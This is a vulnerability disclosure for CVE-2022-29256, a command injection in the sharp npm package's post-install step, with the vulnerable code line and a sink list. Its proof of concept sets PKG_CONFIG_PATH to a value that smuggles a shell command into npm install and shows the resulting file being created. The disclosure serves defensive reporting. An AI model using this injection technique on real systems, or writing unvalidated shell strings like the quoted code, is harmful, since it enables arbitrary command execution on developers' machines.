CVE-2022-29256: OS Command Injection in sharp
Description
sharp prior to version 0.30.4 is vulnerable to OS command injection. The PKG_CONFIG_PATH environment
variable is read to check the version of the pre-built dependency; it is concatenated into a shell command
string without any validation and passed straight to the spawnSync method during the package's post-installation step.
Vulnerable snippet
// lib/libvips.js
66: const globalLibvipsVersion = function () {
67: if (process.platform !== 'win32') {
68: const globalLibvipsVersion = spawnSync(`PKG_CONFIG_PATH="${pkgConfigPath()}" pkg-config --modversion vips-cpp`, spawnSyncOptions).stdout;
69: /* istanbul ignore next */
70: return (globalLibvipsVersion || '').trim();
71: // SNIPPED
Occurrences
Sinks, sorted by backtrace:
- lib/libvips.js:68
- lib/libvips.js:91
- lib/libvips.js:110
- install/libvips.js:112
- install/can-compile.js:6
- package.json:88
Proof of Concept
The vulnerable function is invoked during the package's post-installation step, so setting the variable before installing is enough to trigger it.
$ export PKG_CONFIG_PATH='"; touch pwned #'
$ ls -l
total 0
$ npm install sharp --silent
sharp: Using cached /home/dw1/.npm/_libvips/libvips-8.12.2-linux-x64.tar.br
sharp: Integrity check passed for linux-x64
+ [email protected]
added 67 packages from 204 contributors and audited 67 packages in 5.919s
8 packages are looking for funding
run `npm fund` for details
found 0 vulnerabilities
$ find . -name "pwned"
./node_modules/sharp/pwned
Impact
This issue leads to arbitrary command execution on the machine installing the package.
Timeline
- 20 May 2022: Asked for the proper contact to disclose to.
- 23 May 2022: Vulnerability reported to code owner.
- 23 May 2022: Report acknowledged & vulnerability patched.
- 25 May 2022: Vulnerability disclosed.